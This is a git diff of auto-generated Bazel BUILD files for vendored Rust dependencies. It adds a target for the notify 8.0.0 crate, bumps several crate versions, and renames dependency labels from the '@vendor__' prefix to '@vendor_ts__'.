@@ -0,0 +1,190 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "notify", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "default", + "fsevent-sys", + "macos_fsevent", + ], + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=notify", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + 
"@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "8.0.0", + deps = [ + "@vendor_ts__filetime-0.2.25//:filetime", + "@vendor_ts__libc-0.2.169//:libc", + "@vendor_ts__log-0.4.25//:log", + "@vendor_ts__notify-types-2.0.0//:notify_types", + "@vendor_ts__walkdir-2.5.0//:walkdir", + ] + select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [ + "@vendor_ts__bitflags-2.8.0//:bitflags", # cfg(target_os = "macos") + "@vendor_ts__fsevent-sys-4.1.0//:fsevent_sys", # aarch64-apple-darwin + ], + "@rules_rust//rust/platform:aarch64-apple-ios": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # 
cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:aarch64-linux-android": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) + ], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:armv7-linux-androideabi": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ + "@vendor_ts__inotify-0.11.0//:inotify", # 
cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:i686-apple-darwin": [ + "@vendor_ts__bitflags-2.8.0//:bitflags", # cfg(target_os = "macos") + "@vendor_ts__fsevent-sys-4.1.0//:fsevent_sys", # i686-apple-darwin + ], + "@rules_rust//rust/platform:i686-linux-android": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [ + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) + ], + "@rules_rust//rust/platform:i686-unknown-freebsd": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:x86_64-apple-darwin": [ + "@vendor_ts__bitflags-2.8.0//:bitflags", # cfg(target_os = "macos") + 
"@vendor_ts__fsevent-sys-4.1.0//:fsevent_sys", # x86_64-apple-darwin + ], + "@rules_rust//rust/platform:x86_64-apple-ios": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:x86_64-linux-android": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) + ], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ + "@vendor_ts__kqueue-1.0.8//:kqueue", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "freebsd", target_os = "openbsd", target_os = "netbsd", target_os = "dragonflybsd", target_os = "ios")) + ], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ + "@vendor_ts__inotify-0.11.0//:inotify", # cfg(any(target_os = "linux", target_os = "android")) + "@vendor_ts__mio-1.0.3//:mio", # cfg(any(target_os = "linux", target_os = "android")) + ], + "//conditions:default": [], + }), +) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_limit-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-types-2.0.0.bazel similarity index 97% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_limit-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-types-2.0.0.bazel index 3589754e1c97..2a58d2dd5730 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_limit-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.notify-types-2.0.0.bazel @@ -11,7 +11,7 @@ load("@rules_rust//rust:defs.bzl", "rust_library") package(default_visibility = ["//visibility:public"]) rust_library( - name = "ra_ap_limit", + name = "notify_types", srcs = glob( include = ["**/*.rs"], allow_empty = True, @@ -35,7 +35,7 @@ rust_library( ], tags = [ "cargo-bazel", - "crate-name=ra_ap_limit", + "crate-name=notify-types", "manual", "noclippy", "norustfmt", @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "2.0.0", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.nu-ansi-term-0.46.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.nu-ansi-term-0.46.0.bazel index 654e4c1d4a55..96808381d753 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.nu-ansi-term-0.46.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.nu-ansi-term-0.46.0.bazel 
@@ -81,16 +81,16 @@ rust_library( }), version = "0.46.0", deps = [ - "@vendor__overload-0.1.1//:overload", + "@vendor_ts__overload-0.1.1//:overload", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__winapi-0.3.9//:winapi", # cfg(target_os = "windows") + "@vendor_ts__winapi-0.3.9//:winapi", # cfg(target_os = "windows") ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__winapi-0.3.9//:winapi", # cfg(target_os = "windows") + "@vendor_ts__winapi-0.3.9//:winapi", # cfg(target_os = "windows") ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__winapi-0.3.9//:winapi", # cfg(target_os = "windows") + "@vendor_ts__winapi-0.3.9//:winapi", # cfg(target_os = "windows") ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num-traits-0.2.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num-traits-0.2.19.bazel index a9087f9167ce..96213437ade3 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num-traits-0.2.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num-traits-0.2.19.bazel @@ -86,7 +86,7 @@ rust_library( }), version = "0.2.19", deps = [ - "@vendor__num-traits-0.2.19//:build_script_build", + "@vendor_ts__num-traits-0.2.19//:build_script_build", ], ) @@ -142,7 +142,7 @@ cargo_build_script( version = "0.2.19", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num_cpus-1.16.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num_cpus-1.16.0.bazel index 4e067f66eafa..ccbaed88173e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num_cpus-1.16.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.num_cpus-1.16.0.bazel 
@@ -82,103 +82,103 @@ rust_library( version = "1.16.0", deps = select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:aarch64-unknown-uefi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - 
"@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:thumbv7em-none-eabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:wasm32-unknown-unknown": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], 
"@rules_rust//rust/platform:wasm32-wasip1": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-none": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "@rules_rust//rust/platform:x86_64-unknown-uefi": [ - "@vendor__libc-0.2.169//:libc", # cfg(not(windows)) + "@vendor_ts__libc-0.2.169//:libc", # cfg(not(windows)) ], "//conditions:default": [], }), 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.3.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.2.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.3.bazel index 03549cbfb504..5b194f587bb8 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.once_cell-1.20.3.bazel @@ -85,5 +85,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.20.2", + version = "1.20.3", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.os_str_bytes-7.0.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.os_str_bytes-7.0.0.bazel index afb6050d04e7..ea9024c51ced 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.os_str_bytes-7.0.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.os_str_bytes-7.0.0.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "7.0.0", deps = [ - "@vendor__memchr-2.7.4//:memchr", + "@vendor_ts__memchr-2.7.4//:memchr", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot-0.12.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot-0.12.3.bazel index 93eb0e47dcc5..8dc49b684be5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot-0.12.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot-0.12.3.bazel @@ -84,7 +84,7 @@ rust_library( }), version = "0.12.3", deps = [ - "@vendor__lock_api-0.4.12//:lock_api", - "@vendor__parking_lot_core-0.9.10//:parking_lot_core", + "@vendor_ts__lock_api-0.4.12//:lock_api", + "@vendor_ts__parking_lot_core-0.9.10//:parking_lot_core", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot_core-0.9.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot_core-0.9.10.bazel index 38b7fc7fc6f5..d53c706ee3cb 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot_core-0.9.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.parking_lot_core-0.9.10.bazel 
@@ -82,90 +82,90 @@ rust_library( }), version = "0.9.10", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__parking_lot_core-0.9.10//:build_script_build", - "@vendor__smallvec-1.13.2//:smallvec", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__parking_lot_core-0.9.10//:build_script_build", + "@vendor_ts__smallvec-1.14.0//:smallvec", ] + select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # cfg(windows) + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(windows) ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-linux-androideabi": 
[ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # cfg(windows) + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(windows) ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # cfg(windows) + "@vendor_ts__windows-targets-0.52.6//:windows_targets", 
# cfg(windows) ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear-0.2.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear-0.2.9.bazel index ec071cb5de34..72d8ec29384b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear-0.2.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear-0.2.9.bazel @@ -36,7 +36,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__pear_codegen-0.2.9//:pear_codegen", + "@vendor_ts__pear_codegen-0.2.9//:pear_codegen", ], rustc_flags = [ "--cap-lints=allow", @@ -89,7 +89,7 @@ rust_library( }), version = "0.2.9", deps = [ - "@vendor__inlinable_string-0.1.15//:inlinable_string", - "@vendor__yansi-1.0.1//:yansi", + "@vendor_ts__inlinable_string-0.1.15//:inlinable_string", + "@vendor_ts__yansi-1.0.1//:yansi", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear_codegen-0.2.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear_codegen-0.2.9.bazel index b7f577c7ca46..4ba44587033d 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear_codegen-0.2.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.pear_codegen-0.2.9.bazel 
